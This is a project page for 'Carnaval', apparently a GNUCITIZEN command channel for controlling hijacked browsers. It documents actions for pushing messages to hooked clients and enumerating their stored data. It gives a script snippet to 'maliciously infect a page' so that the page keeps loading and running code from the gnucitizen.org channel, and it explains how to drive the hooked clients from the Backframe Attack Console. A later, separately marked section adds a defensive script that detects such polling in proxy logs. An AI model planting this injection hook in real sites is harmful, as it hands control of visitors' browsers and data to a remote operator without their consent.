Carnaval is a free bi-directional, persistent communication channel. At the moment the service is unrestricted. Depending on how it is used, this status may change.

Carnaval was announced on 24th August 2006 in a post called “Introducing Carnaval”. The concept behind Carnaval’s channel interface is covered in the “Persistent Bi-directional Communication Channels” article published on 2nd October 2006. A subset of the communication channel used in Carnaval is part of the AttackAPI and Backframe projects.

Technically speaking, Carnaval is a communication channel which can be used as a message exchange mechanism between clients. In practice, Carnaval can be used to construct chat rooms, online message broker applications, online games, etc. However, this project is designed specifically for demonstrating Web 2.0 attack vectors. As such, Carnaval was created for educational purposes only. GNUCITIZEN disclaims any responsibility for your own actions.

The channel is the only interactive part available in Carnaval. You can interact with it by using any of the following operations/actions:

ACTION: init – load initialization scripts

Parameter   Description
(none)      (none)

ACTION: pull – pull message from the message queue (default)

Parameter   Description
callback    callback function to handle the message
referrer    the location of the calling client
id          the unique identifier of the calling client

ACTION: push – push message to a client

Parameter   Description
client      the unique identifier of the client the message will be sent to. If not supplied, the message goes to everybody.
message     the message to be sent
target      the same client can be attached to a single channel from different locations; this parameter enables precise message exchange.

ACTION: list – list attached clients

Parameter   Description
callback    callback function that handles the data

ACTION: enum – enumerate attached clients by exposing their stored data

Parameter   Description
callback    callback function that handles the data

ACTION: view – view stored data for one or more attached clients

Parameter   Description
client      the unique client identifier the stored data will be accessed from

ACTION: save – store data for one or more attached clients

Parameter   Description
client      the unique client identifier the stored data will be saved to. If not supplied, the data will be saved globally.
name        name of the field
value       the data content

Parameters in bold are required.

The interaction process is REST (Representational State Transfer) based. You need to supply an appropriate action for each request. You can do that by appending action=[your action] after the question mark when calling Carnaval’s channel.

Carnaval is compatible with the Backframe Attack Console and the AttackAPI library. Building upon Carnaval’s infrastructure is easy.

In order to try out the service you need to maliciously infect a page of your choice with the following code:

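    // Every 2 seconds, append a <script> element whose source is the
    // channel's pull action, so the page keeps polling the message queue.
    setInterval(function() {
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = 'http://www.gnucitizen.org/carnaval/channel?action=pull';
        document.body.appendChild(script);
    }, 2000); void(0);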

Once the tracking code is in action, you will be able to communicate with it via Backframe, AttackAPI or by simply calling URLs compatible with Carnaval’s communication protocol:

http://www.gnucitizen.org/carnaval/channel?action=list&callback=myCallback
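
Seen from the monitoring side, the pull loop above produces requests to the channel URL at a steady two-second interval. The following added example (not part of Carnaval, AttackAPI or Backframe) flags that pattern in proxy logs; the log format `<epoch ms> <client ip> <url>`, the thresholds and the sample lines are assumptions constructed for illustration.

```javascript
// Added example, not Carnaval code. Log format "<epoch ms> <client ip> <url>" is assumed.
const ACTIONS = new Set(['init', 'pull', 'push', 'list', 'enum', 'view', 'save']);

// Return the channel action for a URL, or null if it is not a channel request.
function channelAction(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  if (!url.pathname.endsWith('/carnaval/channel')) return null;
  const action = url.searchParams.get('action') || 'pull'; // pull is the default action
  return ACTIONS.has(action) ? action : 'unknown';
}

// Report clients whose pull requests arrive at a near-constant interval.
function findPollers(logLines, minHits = 5, maxJitterMs = 500) {
  const bySrc = new Map();
  for (const line of logLines) {
    const [ts, src, url] = line.trim().split(/\s+/);
    if (channelAction(url) !== 'pull' || !Number.isFinite(Number(ts))) continue;
    if (!bySrc.has(src)) bySrc.set(src, []);
    bySrc.get(src).push(Number(ts));
  }
  const findings = [];
  for (const [src, times] of bySrc) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    const jitter = Math.max(...gaps.map((g) => Math.abs(g - mean)));
    if (jitter <= maxJitterMs) findings.push({ src, hits: times.length, intervalMs: Math.round(mean) });
  }
  return findings;
}

// Constructed sample: 10.0.0.5 polls every ~2 s; 10.0.0.9 makes two unrelated requests.
const SAMPLE_LOG = [
  '1000 10.0.0.5 http://www.gnucitizen.org/carnaval/channel?action=pull',
  '3010 10.0.0.5 http://www.gnucitizen.org/carnaval/channel?action=pull',
  '4000 10.0.0.9 http://www.gnucitizen.org/carnaval/channel?action=list&callback=myCallback',
  '5005 10.0.0.5 http://www.gnucitizen.org/carnaval/channel',
  '6990 10.0.0.5 http://www.gnucitizen.org/carnaval/channel?action=pull',
  '9000 10.0.0.5 http://www.gnucitizen.org/carnaval/channel?action=pull',
  '9500 10.0.0.9 http://example.org/index.html',
];

console.log(findPollers(SAMPLE_LOG));
```

A request with no action parameter is counted as a pull because pull is the documented default.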

In order to use Backframe, you have to load Carnaval’s channel into the console. Once Carnaval’s user interface is loaded, click on the Backframe link. That will take you to the Backframe Attack Console. The console will ask you for confirmation to load a dynamic profile. After you confirm that, you will be able to communicate with the attached clients.

If you have a proposal, question, suggestion or correction, please contact us.